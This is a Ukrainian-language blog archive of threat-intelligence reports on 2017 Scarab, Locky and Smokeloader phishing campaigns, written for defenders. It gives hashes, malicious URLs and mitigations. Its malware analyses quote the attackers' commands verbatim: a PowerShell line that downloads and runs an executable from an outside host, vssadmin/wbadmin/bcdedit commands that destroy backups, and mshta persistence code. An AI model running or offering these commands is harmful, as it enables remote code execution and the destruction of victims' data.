Tag Archive | Windows Script Host

IOC_Scarab_231117

Доброго дня, панове.

Звіт стосується розсилок Scarab Ransomware, які відбувалися на минулому тижні. Публікую для академічного розгляду оскільки:

Рівень загрози – нижче середнього. Для тих, хто прислухався до моїх рекомендаційнизький.

Звернень по цьому типу мені не надходило, а кім того, технічно механізм інфікування Scarab не відрізняється від інших (Locky, Cerber), які я вже розглядав.

Проте зважаючи на те, яку увагу (з подачі Кіберполіції) ЗМІ приділили розсилкам саме цього зразка – вирішив усе ж таки його розібрати.

Не без того, щоб вкотре нагадати вам прості та дієві методи захисту.

Трохи аналітики:

  • Шифрування стійке. На даний момент способу відновити файли – не знайдено
  • Факти інфікування даним класом шкідливого коду говорять про низький рівень обізнаності
  • Scarab спричинив багато галасу, бо на відміну від Locky, він шифрує одразу без перевірки умов, ще раз – Scarab шифрує завжди там, де був запущений
  • А це значить, що жертви Scarab ігнорували попередні інциденти тому що, розсилки з Locky не призводили до шифрування
  • Метод доставки – масовий, неперсоніфікований, нелокалізований, низькоякісний фішинг типу “відскановані документи”
  • Тип приманки – необфусковані VBS скрипти в архівах 7zip
  • Скрипти містять від 2 до 3 посилань на завантаження основної частини
  • Активація та шифрування відбуваються з правами користувача і можуть проходити без мережевих з’єднань (offline)
  • Ім’я основної частини чітко задане кодом скрипту і не змінюється
  • Перед початком шифрування зразок намагається видалити Shadow Copy, якщо права не надавати – шифрування продовжиться, просто без видалення тіньових копій

Схема атаки:

email > Attach 7z (VBS) > WSCript > GET JHgd476? > %temp%\VJMAQASU.exe

Маркери IOC:

приклади листів:

один із скриптів-приманок:

File name image2017-11-22-5379282.vbs
SHA-256 fd072a6c2fe9187f799a27e21c27fc67dd2f145ccbc0faa917f37469d0d26974
File size 3.8 KB

містить три посилання на завантаження основної частини:

krapivec = Array("miamirecyclecenters[.]com/JHgd476?","pamplonarecados[.]com/JHgd476?","hard-grooves[.]com/JHgd476?")

Останнє – досі активно і на звернення видає основну частину:

File name JHgd476  >> %temp%\VJMAQASU.exe
SHA-256 7a60e9f0c00bcf5791d898c84c26f484b4c671223f6121dc3608970d8bf8fe4f
File size 356.5 KB

Приклад запуску без надання привілеїв:

Приклад запуску із наданням привілеїв через UAC:

Запуск скрипту приводить до завантаження основної частини за шляхом %temp%\VJMAQASU.exe

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\image2017-11-22-5379282.vbs" 
"C:\Windows\System32\cmd.exe" /c call "C:\tmp\VJMAQASU.exe"
"C:\tmp\VJMAQASU.exe"

Після запуску Scarab через cmd.exe копіює своє тіло у %AppData%\Roaming\sevnz.exe

Та намагається отримати підвищення привілеїв для видалення тіньових копій (UAC)

Якщо йому це вдається, він копіює своє тіло ще раз у %AppData%\Roaming але вже для адміністративного облікового запису

"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\operator\AppData\Roaming\sevnz.exe"
"C:\tmp\VJMAQASU.exe" runas
"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\support\AppData\Roaming\sevnz.exe"
"C:\Users\support\AppData\Roaming\sevnz.exe"

Далі через mshta за допомогою javascript команд Scarab додає в автозавантаження посилання на замітку про викуп і ініціює видалення тіньових копій:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\uSjBVNE',i);}catch(e){}},10);"
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\STYRX\\OCDPR'));close();"
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
vssadmin  Delete Shadows /All /Quiet
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

В фоні відбувається шифрування через послідовний перезапис файлів процесом AppData\Roaming\sevnz.exe

По завершенню шифрування Scarab відкриває файл із заміткою про викуп та ініціює видалення свого тіла (за обома шляхами – temp та appdata)

C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
notepad.exe  "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('VJMAQASU.exe');close()}catch(e){}},10);"

Зашифровані файли отримують розширення .[suupport(@)protonmail[.]com].scarab

Шифрування невеликої кількості документів зайняло ~5-7 хвилин

Частина замітки про викуп:

__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
123oin123njnjndoiqn2oenq2oindiqndkqndknwqkndkawndkawndkl
-----END PERSONAL IDENTIFIER-----

All your files have been encrypted due to a security problem with your PC.

Мережеві IOC:

завантаження основного тіла Scarab:

5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1 
98.124.251.75:80      HTTP 375 atlantarecyclingcenters[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
98.124.251.75:80      HTTP 371 miamirecyclecenters[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.173.111:80      HTTP 364 hard-grooves[.]com GET /JHgd476? HTTP/1.1 (досі активний)

відправка даних про Public IP

88.99.66.31:80       HTTP 101 iplogger[.]co GET /18RtV6.jpg HTTP/1.1 - передача через cookie

Що можна було зробити аби уникнути інфікування ?

  1. Фільтр скриптових приєднань (VBS, JS, JSE, WSF..)
  2. Заборона завантаження скриптових та запусних файлів (payload у Scarab не шифрований)
  3. Заборона створення VBS та EXE в каталозі профілю користувача (приклади правил наведені нижче)
  4. Деактивація механізму Windows Scritp Host (другий варіант)
  5. Або блокування вихідного трафіку для процесів WSCritp та CSCript (перший варіант)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Заборона створення скриптових файлів (увага! приклад тільки для VBS, рекомендується продублювати правила для JS, JSE, WSF)

Name: _VBS_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.VBS
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/створення/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_121117_ДСНС_gov.ua

Доброго дня, панове.
Візьміть до уваги – в розсилці приймала участь скринька з домену gov.ua (заголовки не підроблені)!

12 листопада, близько 23ї години були зафіксовані спроби доставки троянського коду типу Smokeloader (Chanitor) (попередні зразки тут, тут і тут).
Цей клас шкідливого коду є сервісом доставки троянів або модулів для крадіжки паролів (Pony та ін.)
Фактично через нього зловмисники збирають інформацію із скомпрометованих систем і можуть в подальшому довантажити модуль шифрування/затирання файлів.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) – зверніть увагу на приклади трьох правил Access Protection які наведені в кінці допису

Трохи аналітики:

  • Рівень загрози – високий!, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.
  • Незважаючи на вельми примітивну техніку активації приманки (JS скрипти) я ставлю цій розсилці високий рівень загрози через той факт, що одним із джерел була скомпрометована скринька Управління ДСНС Чернігівської області (sribne@cndsns[.]gov[.]ua)

  • Схема роботи та інші атрибути вказують на роботу тої самої команди що розсилала цей же тип ШПЗ 17 жовтня
  • Доставка – через обфусковані JS скрипти із подвійним розширенням у оболонці lzh. (застосували інший формат для обходу фільтрів пошти)
  • Скрипт який було надано а аналіз містить одну прямо задану адресу, а основна частина записується із прямо заданим іменем файлу
  • Завантаження основної частини відбувається не через WSH, а засобами Powershell
  • Сервер з якого завантажується payload та сервер контролю – один і той же
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Знову застосовується тактика використання скомпрометованих ресурсів/серверів держ. організацій – gov.ua як правило в “білому” списку
  • Слід очікувати повторних акцій із використанням міксу різних типів доставки та скомпрометованих джерел із зони gov.ua та ua
  • Не достатній рівень уваги до вразливостей застарілих версій систем, яким скористалися зловмисники, призвела до компрометації цього серверу, завтра чи навіть через годину хтось може стати наступним – не будьте жертвою, перевірте наявні вразливості, оновіть софт, змініть паролі

Схема атаки:

email > Attach (lzh) > JS > WSCript > PowerShell > single hardcoded URL > GET > %temp%\65536.exe 
ім'я запускного файлу(співпадає з попередньою розсилкою)

Маркери IOC:

архів:

File name Рахунки Продмаркет.lzh
SHA-256 a47e11e6dc8025575ac3f1742fcf84270d9cd2ab1757d59dee873b1a35f76528
File size 65.34 KB

скрипт приманка:

File name Рахунок по оплаты.xls.js
SHA-256 d0635dfd5e212e16c580d70a18d195a5cc842355a22348f925515a5520725231
File size 21.38 KB

основна частина:

File name micro.exe >> %temp%\65536.exe
SHA-256 63da5f0e5ed298cbf39422298c80f460fa75f46c7d78ce0dd806f30e70c027b5
File size 240 KB

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\рахунок до оплаты.xls.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;
$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';
$http_request.open('GET', 'h11p:\\autoxls[.]ru/documentooborot/micro.exe', $false);
$http_request.send();if($http_request.Status -eq "200"){$adodb.open();
$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;
$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у

%User%\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe (співпадає з попередньою розсилкою)

Та додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-....\Software\Microsoft\Windows\CurrentVersion\Run
IM Providers
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає кілька нових екземплярів explorer.exe і оперує від їх імені.

Зверніть увагу, що запущені процеси на х64 запускаються не з C:\Windows\ (штатний режим) а з C:\Windows\SysWOW64\

Мережеві IOC:

завантаження payload – досі активна

54.86.9.242:80 HTTP 375 autoxls[.]ru GET /documentooborot/micro.exe HTTP/1.1

трафік скомпрометованої системи – сервер контролю

54.86.9.242:80 HTTP 117 bbank[.]bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

а тепер саме головне

Що можна було зробити аби уникнути інфікування ?

  1. Пересилку архіву із скриптом можна було заблокувати через фільтр приєднань по розширенням/типам файлів, але за умови що він розуміє формат lzh (Email Gateway)
  2. Запис JS приманки на диск (розпаковку файлів) можна було заборонити через блок створення JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Передачу команди з WSCript на Powershell можна було заборонити через Access Protection Rules
  6. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)
Таким чином, як бачите, до запуску основного тіла було 6 кроків, упередження хоча би одного з них = зупинка атаки.

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Заборона виклику POwershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_171017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки троянського коду типу Smokeloader (Chanitor) (розглядав раніше – тут, тут і тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Скрипт який було надано а аналіз містить одну чітко вказану адресу, а основна частина записується з чітким іменем файлу.

Цікаво, що завантаження відбувається не через WSH а засобами Powershell.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектується по GTI.

Схема атаки:

email > Attach (7z) > JS > single hardcoded URL > GET > %temp%\65536.exe

Маркери IOC:

архів:

File name документи.7z
SHA-256 397ad07ab15f802559ac1829ac9c8434bc7c0b6fb55264b088659b638a28ad0d

скрипт приманка:

File name Договор_1743.js
SHA-256 56d9c0da7f825cb474633057e12a1cf197af2352bd0d876591483e2d40472fda

основна частина:

File name pax.exe      >> %temp%\65536.exe
SHA-256 99671ce5287926ac6496a37abd42c87cc1a045696244cc833c3dbc041270cc25

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Договор_1743.js"

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObject ADODB.Stream;$path = $env:temp + '\65536.exe';$http_request.open('GET', 'h11p://docfileserver.ru/bank/pax.exe', $false);$http_request.send();if($http_request.Status -eq "200"){$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);$adodb.position = 0;$adodb.savetofile($path);$adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

"C:\tmp\65536.exe"

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Додає себе у автозавантаження через HCU\Run

HKEY_USERS\S-1-5-21-136527031-2493574210-1221074019-1000\Software\Microsoft\Windows\CurrentVersion\Run 
Classes
C:\Users\operator\AppData\Roaming\Microsoft\tjerrirf\rtdiubth.exe

Запускає новий екземпляр explorer.exe і оперує від його імені.

Трафік скомпрометованої системи:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Відволікаючи маневр – з’єднання із сайтами java, MS etc

[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT 
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED
[System Process] 0 TCP 10.0.2.15 52512 139.59.208.246 53 TIME_WAIT
explorer.exe 776 TCP 10.0.2.15 49324 95.100.1.194 80 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 49325 95.100.1.194 443 ESTABLISHED
explorer.exe 776 TCP 10.0.2.15 52516 23.64.230.126 80 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу Powershell (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

49.51.38.37 80 HTTP 368 docfileserver.ru GET /bank/pax.exe HTTP/1.1

трафік системи після зараження:

49.51.38.37 80 HTTP 117 bbank.bit POST / HTTP/1.1  (application/x-www-form-urlencoded)

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_smokeldr_111017

Доброго вечора, панове.

Сьогодні зранку було зафіксовано спроби доставки троянського коду типу Smokeloader (розглядав раніше – тут та тут).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS скрипти у оболонці 7z.

Користувачі захисту кінцевих точок McAfee – зверніть увагу, payload уже детектуєтся по GTI.

Серед скомпрометованих сайтів, що розповсюджують шкідливий код – ООО “Радар Комплект” (h11p://radar.org.ua)

Схема атаки:

email > Attach (7z) > JS > 1 URL > GET > %temp%\random.exe

Маркери IOC:

архів:

File name Док. УЛФ-Финанс.7z
SHA-256 d100a27a4c0dc9c3eaf3c1d5099ec06dd48038818d1ebc325944ee61301024a6
архів:
скрипт приманка:
File name Накладная 001.js
SHA-256 185c98cf2a5dfa5969affadfea14341ecce6f86dbfd549e7e8c5f59fd9e98335

Запуск скрипта-приманки ініціює завантаження основної частини засобами WSCript.exe

Після завантаження та запуску payload негайно зупиняє роботу утиліт моніторингу, копіює себе у %AppData%\Roamin\Microsoft\random\random.exe

Додає себе у автозавантаження через HCU\Run

Запускає новий екземпляр explorer.exe і оперую від його імені.

Трафік скомпрометованої системи:

47.88.63.235 80 HTTP bbank.bit POST

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

193.138.152.4 80 HTTP 384 h11p://www.poptavka-remeslnici.cz GET /profile/gallery/putty.exe HTTP/1.1 
46.36.223.11 80 HTTP 357 h11p://neocom21.com.ua GET /putty.exe HTTP/1.1
139.162.170.147 80 HTTP 358 h11p://www.radar.org.ua GET /putty.exe HTTP/1.1
47.88.63.235 80 HTTP 370 h11p://reanimationhelthcs.ru GET /foping/putty.exe HTTP/1.1


дані по листам:
IP:      82.207.79.108, 89.151.191.14
email: admyurist [@] cv.ukrtel.net, red_krarm [@] cbx.ru

трафік системи після зараження:

47.88.63.235 80 HTTP bbank.bit POST

Контрзаходи:

– – – – – – – – – – –

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_05-061017

Доброго дня, панове.

В черговий раз фіксуємо спроби доставки Locky Ransomware (вже розглядав , та ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Подробиці:

На аналіз були надані два зразки скриптів, які відносяться до однієї кампанії.

Їх активація призводить до завантаження одного й того ж зразка.

Скрипти містять по 3 посилання, перевірки коду країни не виявлено.

GET запити не відрізаються. Частина посилань досі активна!

Користувачі захисту McAfee, зверніть увагу на дві речі:

  • payload детектується по GTI
  • репутація посилань низька – блок на MWG, NSP та WebControl

Схема атаки:

email > Attach (7z) > VBS > 3 URL > HTTP GET > %temp%\random.exe

Маркери IOC:

File Name Invoice_INV000267.vbs
SHA-256 Hash Identifier 158851690993F35C542E43FEF8747487AF7DFDC2C7051F98AF8469EE287AC8A0
File Size 11829 bytes
File Type ASCII text

Plyask = Array("bnphealthcare.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","balzantruck.com/9hgfdfyr6?")

 

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

завантаження >

File Name WwLlYA.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

другий скрипт

File Name Invoice_INV000104.vbs
SHA-256 Hash Identifier 919260CC38BF4F7B7BA93F716BA1D12DB4CDEF597F0A94C9036B8F8A16D99BCB
File Size 11743 bytes
File Type ASCII text

Plyask = Array("balzantruck.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","georginabringas.com/9hgfdfyr6?")

 

69.156.240.29      balzantruck.com          GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний
178.136.206.128   mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29        georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

завантаження >

File Name iYwHXKr.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
178.136.206.128    mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29         georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

не активні

69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_041017

Доброго дня, панове.

На протязі останніх днів було зафіксовано масові спроби доставки Locky Ransomware (розглядав тут і тут ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через обфусковані JS та необфусковані VBS скрипти у оболонці 7z та Zip.

Схема атаки:

email > Attach (7z/Zip) > JS / VBS > 2-3 URL > GET > %temp%\random.exe

Маркери IOC:

f17e6d1e-3827-47da-b191-55e94e24c406

5.2.88.79 80 HTTP 300 embutidosanezcar.com GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (-)
194.116.187.130 80 HTTP 387 basedow-bilder.de GET /jhgf54y6??UuhgwJfbwT=UuhgwJfbwT HTTP/1.1 (+)

завантаження >

Filename UuhgwJfbwT3.exe
Size 576KiB (589824 bytes)
SHA256 b38ba4b2328342e46bdb396710161535870a1421819eae171f99a114a3d958a0

I_197975

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)
185.119.213.186 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??mywoMVI=mywoMVI HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

I_980998

98.124.251.69 80 HTTP 298 theceocforeporter.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)
77.122.77.216 80 HTTP 321 sherylbro.net GET /p66/873gfhi3f3r%20robsacks.com/873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (-)

помилка в скрипті, завантаження не проходить, а реальна діюча адреса така:

184.168.92.220 80 HTTP 373 robsacks.com GET /873gfhi3f3r??NRyvRxz=NRyvRxz HTTP/1.1 (+)

завантаження >

Filename 873gfhi3f3r.exe
Size 576KiB (589824 bytes)
SHA256 5a563e7b4523310c4cacd24956ef84f0af27a3cb6457d662da1db29d48918add

New Doc 2017-10-02 – Page 3 -8402

86.109.170.198 80 HTTP 296 globoart.es GET /ldjivy$?S(@M?%0F?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)
46.175.146.50 80 HTTP 294 sherylbro.net GET /p66/ldjivy78?uPcATUcPa=uPcATUcPa HTTP/1.1 (-)

New Doc 2017-10-02 – Page 3 -8692

66.71.182.143 80 HTTP 297 maurocesari.it GET /ldjh??L?%01]?M?%0F?wLoxrGw=wLoxrGw HTTP/1.1 (-)
109.86.76.228 80 HTTP 290 sherylbro.net GET /p66/ldjivy78?wLoxrGw=wLoxrGw HTTP/1.1 (+)

завантаження >

Filename wLoxrGw4.exe
Size 595KiB (608768 bytes)
SHA256 70d06bd4e6a91b60bc8515e327fa1f9fb7ac82125e3c8a06359b5bb3f96e48f3

свіжий, необфускований VBS, перевірки коду країни нема

Invoice505122638848637420994974

Plyask = Array("tecnigrafite.com/8etyfh3ni?","derainlay.info/p66/8etyfh3ni","securmailbox.it/8etyfh3ni?")
